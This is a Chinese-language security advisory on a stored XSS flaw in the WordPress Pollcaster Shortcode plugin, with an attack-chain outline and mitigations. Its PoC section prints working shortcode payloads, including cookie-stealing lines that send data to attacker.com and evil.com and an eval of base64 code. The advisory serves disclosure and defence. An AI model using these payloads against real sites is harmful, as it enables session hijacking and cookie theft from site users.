CVE-2025-12661 WordPress Pollcaster Shortcode Plugin存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12661

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pollcaster Shortcode Plugin for WordPress

漏洞概述

CVE-2025-12661是WordPress Pollcaster Shortcode插件中的一个存储型跨站脚本（Stored XSS）漏洞。该插件在所有版本直至1.0版本中存在安全缺陷，原因是插件对用户提供的短代码属性（如height参数）缺乏充分的输入清理和输出转义处理。攻击者通过在pollcaster短代码的height参数中注入恶意JavaScript代码，当其他用户访问包含该恶意代码的页面时，注入的脚本将在受害者浏览器中执行，可能导致会话劫持、敏感信息窃取或进一步的攻击。由于该漏洞为存储型XSS，恶意代码会永久保存在数据库中，影响所有访问相关页面的用户。攻击者需要拥有WordPress contributor级别或更高的账户权限即可利用此漏洞。

技术细节

该漏洞源于Pollcaster Shortcode插件在处理短代码属性时未进行适当的安全过滤。具体问题出在pollcaster.php文件的第33行附近，插件直接使用用户提供的height参数值而未进行HTML转义或输入验证。攻击者可以利用WordPress的短代码机制，在帖子或页面内容中插入带有恶意脚本的pollcaster短代码，例如：[pollcaster height='" onmouseover="alert(document.cookie)" x="']。当页面渲染时，未转义的height参数值会被插入到HTML属性中，破坏原有属性结构并注入新的事件处理器。存储型XSS的特性使得恶意代码会被永久存储在WordPress数据库中，每次页面加载时都会执行。攻击者通常利用此漏洞窃取管理员Cookie、劫持会话或进行蠕虫传播。CVSS 3.1评分6.4反映了该漏洞通过网络可利用、需要低权限、影响范围有限的特点。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用的WordPress版本，确认安装了Pollcaster Shortcode插件（版本<=1.0）

STEP 2

2. 账户获取

攻击者获取WordPress contributor级别或更高权限的账户，可以通过社会工程学、密码爆破或利用其他漏洞获得

STEP 3

3. 恶意代码注入

攻击者在帖子、页面或评论中插入带有恶意payload的pollcaster短代码，利用height参数注入XSS代码

STEP 4

4. 代码存储

恶意短代码被WordPress保存到数据库中，作为存储型XSS持久化存在

STEP 5

5. 受害者触发

当其他用户（管理员、编辑或其他贡献者）访问包含恶意代码的页面时，浏览器会执行注入的JavaScript

STEP 6

6. 攻击成功

攻击者通过XSS可以窃取会话Cookie、劫持用户账户、进行蠕虫传播或执行进一步的内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-12661 PoC: Stored XSS in Pollcaster Shortcode Plugin -->
<!-- Requires contributor-level or higher WordPress account -->

<!-- Basic PoC - Inject malicious script via height parameter -->
[pollcaster height='" onerror="alert(String.fromCharCode(88,83,83))" x="']

<!-- More sophisticated PoC - Cookie stealing -->
[pollcaster height='" onmouseover="fetch('https://attacker.com/log?c='+document.cookie)" style="xss:expression(open(0)"']

<!-- XSS payload for session hijacking -->
[pollcaster height='"><script>document.location='https://evil.com/steal?cookie='+document.cookie</script>']

<!-- Event handler based XSS -->
[pollcaster height='" onload="eval(atob('YWxlcnQoJ1hTUyBDb250YWluZWQgJyk='))" x="']

影响范围

Pollcaster Shortcode Plugin <= 1.0

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）如果业务不需要Pollcaster Shortcode插件，立即停用并删除；2）使用WordPress安全插件（如Wordfence）添加基于规则的XSS防护；3）通过Web应用防火墙（WAF）规则拦截包含可疑短代码属性的请求；4）限制用户的文章发布权限，移除contributor角色的直接发布能力；5）实施严格的Content Security Policy，禁止内联脚本执行；6）监控日志中的异常请求模式，及时发现潜在的利用尝试。